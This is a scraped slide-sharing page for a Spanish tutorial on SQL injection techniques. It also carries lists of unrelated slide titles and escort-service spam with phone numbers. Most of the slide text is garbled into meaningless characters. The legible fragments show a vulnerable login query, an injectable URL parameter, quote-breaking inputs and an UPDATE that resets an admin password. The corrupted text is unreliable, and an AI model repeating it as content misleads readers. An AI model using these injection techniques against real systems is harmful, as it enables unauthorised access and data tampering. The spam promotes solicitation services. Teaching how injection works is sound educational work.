 

Similaire à Tecnicas de sql injection (20)

Sorting insertion-sort
Sorting insertion-sortSorting insertion-sort
Sorting insertion-sort
 
Les antigènes de P .Falciparum
Les antigènes de P .FalciparumLes antigènes de P .Falciparum
Les antigènes de P .Falciparum
 
Fusion 06 2003
Fusion 06 2003Fusion 06 2003
Fusion 06 2003
 
Modul kerajaan-sriwijaya
Modul kerajaan-sriwijayaModul kerajaan-sriwijaya
Modul kerajaan-sriwijaya
 
Biomoleculas
BiomoleculasBiomoleculas
Biomoleculas
 
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
Hacia un elearning multisoporte y multicanal: uso de nuevos soportes en los c...
 
2010 financieel jaarverslag
2010 financieel jaarverslag2010 financieel jaarverslag
2010 financieel jaarverslag
 
Susceptibilité familiale et éthnique au paludisme
Susceptibilité familiale et éthnique au paludismeSusceptibilité familiale et éthnique au paludisme
Susceptibilité familiale et éthnique au paludisme
 
Euawr workshop brochure
Euawr workshop brochureEuawr workshop brochure
Euawr workshop brochure
 
Torquato Dalcich - Un diario (1944 - 1945)
Torquato Dalcich - Un diario (1944 - 1945)Torquato Dalcich - Un diario (1944 - 1945)
Torquato Dalcich - Un diario (1944 - 1945)
 
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
ΠΛΗ31 ΤΥΠΟΛΟΓΙΟ ΕΝΟΤΗΤΑΣ 1
 
Analisis estructural parte 3
Analisis estructural parte 3Analisis estructural parte 3
Analisis estructural parte 3
 
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
Implementing a home gateway with Linux - Firewall - Router - Proxy server - D...
 
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ) ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
ΠΛΗ31 ΜΑΘΗΜΑ 1.4 - ΚΑΡΤΑ (ΕΚΤΥΠΩΣΗ)
 
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
Peace through understanding Islam || Mawlana Feizel Chothia || Australian Isl...
 
Media sosial mention2011-libre
Media sosial mention2011-libreMedia sosial mention2011-libre
Media sosial mention2011-libre
 
Poverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal miningPoverty eradication focusing on artisanal mining
Poverty eradication focusing on artisanal mining
 
16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles16 intégrales curvilignes, formes différentielles
16 intégrales curvilignes, formes différentielles
 
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
ΠΛΗ20 ΚΑΡΤΕΣ ΜΑΘΗΜΑΤΟΣ 1.5 (ΕΚΤΥΠΩΣΗ)
 
If you can
If you canIf you can
If you can
 

Plus de Alan Resendiz

Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.
Alan Resendiz
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
Alan Resendiz
 
50 trucos para google
50 trucos para google50 trucos para google
50 trucos para google
Alan Resendiz
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
Alan Resendiz
 
Revista de conceptos informáticos
Revista de conceptos informáticosRevista de conceptos informáticos
Revista de conceptos informáticos
Alan Resendiz
 

Plus de Alan Resendiz (11)

Http al descubierto
Http al descubiertoHttp al descubierto
Http al descubierto
 
Comandos linux
Comandos linuxComandos linux
Comandos linux
 
Xss con javascript
Xss con javascriptXss con javascript
Xss con javascript
 
Xss a fondo
Xss a fondoXss a fondo
Xss a fondo
 
Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.Comandos GNU/Linux-Unix y programación shell.
Comandos GNU/Linux-Unix y programación shell.
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
 
Lenguaje html
Lenguaje htmlLenguaje html
Lenguaje html
 
50 trucos para google
50 trucos para google50 trucos para google
50 trucos para google
 
Manual de linux
Manual de linuxManual de linux
Manual de linux
 
Sistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de ServicioSistemas Distribuidos de Denegación de Servicio
Sistemas Distribuidos de Denegación de Servicio
 
Revista de conceptos informáticos
Revista de conceptos informáticosRevista de conceptos informáticos
Revista de conceptos informáticos
 

Dernier

Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
soniya singh
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
Escorts Call Girls
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
Diya Sharma
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
SUHANI PANDEY
 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
SUHANI PANDEY
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
kojalkojal131
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
SUHANI PANDEY
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
gwenoracqe6
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
SUHANI PANDEY
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
EleniIlkou
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
Neha Pandey
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Delhi Call girls
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Delhi Call girls
 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
singhpriety023
 

Dernier (20)

Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
VIP Model Call Girls Hadapsar ( Pune ) Call ON 9905417584 Starting High Prof...
 

Tecnicas de sql injection

  • 1. !
  • 2. ! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
  • 3. 2 ; " " 6 " . " " .& 9 " ) ) * 9 * " " 6 ) + " " " ) " 5 . " & 7 " 6 (& " " " . 4 #$%& " * " 9 " " ( " " " " " $ ! % & ' 5 * " D C 2 . " " ) 4 ) " ) " 6 " . - ' & )4 6 " . 4 " * 9 " * " 9 " ) " " "& 9 " 9 ( " ) 4 ( ) " & " * ) " * . " 4 " " % " + 4 " . 4 #8$ 8% ># 8 . " $ + % . . > * 6 * 6 7 " D C & #8$ 8% + * & 6 " . "& #$% E# $ + % . . F ! * " " " " D " & 9 - ( " ) " " ,- 9 " . & 9 . 4 #$% " 6 + = " " " E#+) " & : + " * <F * 6 " " 51# CB@ + " #: * " CB % . . = " 6 " " #$%BC + #$%C & " " ) 4 " " " "& + .= . " 6 " " 6 " " " +& " D " " >! #$%> " 9 4 " 9 " " . 4 ) ) " 6 " & ( 4 " " . " 4 " "= 9 . & 6 " " #$%2 " ) " " . 4 " . 6 "& 9 " + 9 " " " " 6 6 " 6 . 4 " ( ) * # +, $ ( " " " " " ) " " " 9 - + " * & ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " " " F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51
  • 4. 3 5 ) & " " C & 9 " " . ) " " " ( ) " ) & ) 9 . ) " " 6 " 7 9 9 " ) 4 & " 9 " ) * " " - " . = " 6 6 " # & E! 9 " ) " 6 " 2F " 9 " * ) 4 = " * 9 " ) :# 2 % " 9 " 7" " " & + ) " " " ) " & " * * 9 - " . = " :# " 9 " * & ) = ) 9 " ) " :# 2 G " 1; 8 " " & " * ( ) 9 " 6 " " 6 & 9 = " . " 9 6 6 " . ' " & 6 " 9 " )= " #+) " " - " , " 9 . :# + " * G " 1; , " * D CC = 6 " ) #0#$%& ) 4 ) > " * #$% # 6 3 * G " 1;> H " & " ( = ( " " D CC2 , " " & 67" " " * #$%& " * " 6 " 6 " " " . E#$% F& 9 ( " . " " " " " & " + CC? " #$% @ " & " 9 " " " 9 6 " #+) " G " 1;& + . #$% CCB " * 0 " ) " . . 6 " " " 5 ) . " & " * #$% " 6 " & 9 " " " " I ) & " 9 " ) " * " ) . " - " , " ( #$% # 6 & " 6 ) " 9 " . " " & " . " " "& " " " " 6 4 " " " . " & 9 " " " " " "& ) = " 4 6 " . . " " =" " "- .# / ! 0 ' 9 * & " " * & * " 9 6 9 " " " * " + 9 " " "& " " " ) " 6 "& + " " #$% # 6 " < " .
  • 5. ? # ) " ) + " " #$% ) " & 4 & * " " ) " " ) " " . 9 )6 ) = " ) 4 . & " 9 . " " & " 9 & " & " + ) " ) 4 " E' " " J " " " " #0#$% # 6 & 9 " 6 " " F 8 " " & " . " " ) " " 9 " 6 ) " " " " " " " #0#$% 9 " . & 6 6 " 9 " . " )4 6 & " 7 " #$% 4 %# ) ; . " & ". " * " " " " + " 6 "& 9 4 " " #0#$%& " "* " * & 4 " " "& 9 ) " . 6 " 8 " #0#$% " . " " >#5> + . " = " & "" * " " > > E- KKF 8 " 9 . " = & 9 6 " #5 " ( . " " 6 4 " EIF " #0#$% # 6 & ) " " ) " " " & " ) 7 " " 6 " < " 6 . "& " 4 & " " < " ( 1 ( * $# + ) #0#$% " < " " "& ) = " 1 % )" 6 L"& " 4 " " . " " < " " ) 4 " 5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = " " " ( 9 " 9 " " * " " & " " " ;'! ! + 1 ! 5 " + " 9 " E8" F ( ) " " & " 6 #0#$% # 6 & " " ;'! 332 5 ) " ) " I . " 9 . " ) " + ) 4 " 6 " 9 " " " + * " " " " ) 9 " " ) " " " . & 9 " #0#$% " & *
  • 6. @ 8 * 6 " ) " " = " " D " 6 #$% E! 4 #5 "" > >F " " " " 7 " + #$% " 9 6 " . " & " 9 ) 7 "& " " 6 "& . ;:,:# " " " ) " " 6 ) 1 + ( & ,#)) ; , 6 % * " >; ! * . " * #$% # 6 > O#$% # 6 " * " " " , ") " - ** " " " > 8" " . * 9 1: < " 6 "& " 9 " " * * " + " " 6 P & " " " " 6= " 9 " " " ,! " #$% # 6 " & " ) . " " " " " " < "& 9 + " " ) < & " " " " " 6 ) " # ) " " " " * " ") " ) ** #$%& 9 " " ) > M . 8< " G " >& " ) " ") ) ** " ) " " " " " >" 6Q * EF> 5 " < = " > M . 8< " G " > E #-1 B303B 022CB0@F " " 9 ( < ) < Q M9 < Q " " < Q < < Q" "9 " + < Q"9 . < Q " " < Q" 6 < Q " + " < Q 6) ! -""" " Q " Q " Q . + " Q " + " Q " +
  • 7. "2 % & , ; " ) & #$% " . 4 " " 5 " " * " < " " " " " E!%0#$% " : & ; " 0#$% " " * F " 6 "& < " . " " " "& . " " " " & " * * " 6 ( " " " . " % & +% + % ! .# . & / 51; ( . " " 8H:R8 ( 6 " " ,81S ( . " % & ++ + + ) .# . & ' 85;8 ( 6 " ) "& " = " , :! 8 ) " = " 5%;8 ( * " ) " . . " ) * " " % & + + #! .# . & #8%8'; ( " . " " ) " " 9 " "* . 1#8 ; ( . " " ) " " J !,5;8 ( * " 6 " " " + . " " " * " ,8%8;8 ( . " " ) ) " " %! # #! % " " " " " * ( " * " " 9 " " %! # #! A : ( " * ) " 6 " " . " " G 8 8 ( " * " " 9 ) " . " " 9 " 6 " / : ! -S ( " " . " " " " . " " =* " 5H 1/ ( < " 9 ) " "* . : ,8 -S ( " . " " " " " *
  • 8. B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
  • 9. C " 6 " ) & )4 6 * " " " = " # ) " < 6 " " ) " "& " 6 " ) " . * & " 9 " " * " " 6 " 6 9 " . " 6 " " " < + . " " ) " " " " 6 ) 5 " * " 4 . 4 J . " & ! " # " & " * " " 9 . " " " 7 " " " 8 " & + )4 6 . .J " " " & " " ! " # & ) 4 " " . " " 0 8* " ! 6 . " 0 5 9 " , # #$% 4 0 :) * 0 8< + " " = " 0 ' " ; " , " * & " 4 * 9 * + 9 . ) 4 " . " )4 6 " " * " 6 " ( 6! # ) 7 >#$% 4 > " ) J ) " " " * #0#$%& " 9 . " 9 " & " & 9 " " 9 ) . < 7< 8" " . * 9 " " ) " " " " " " 6 ( " . " " * " 9 6 " " < " * "& " 9 & . " ". * 8" " 6 " " " =* " " 9 + " " " G " * # 6 " 4 " ) " " 5#! ) " " " #0 #$%& " " " G " 9 * " 6 " ) + 4! $ (! & 5 9 " =" " 9 " " " 6 ) & * " ( " " " + .= " " " < 7< "
  • 10. 8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
  • 11. + ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
  • 12. select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
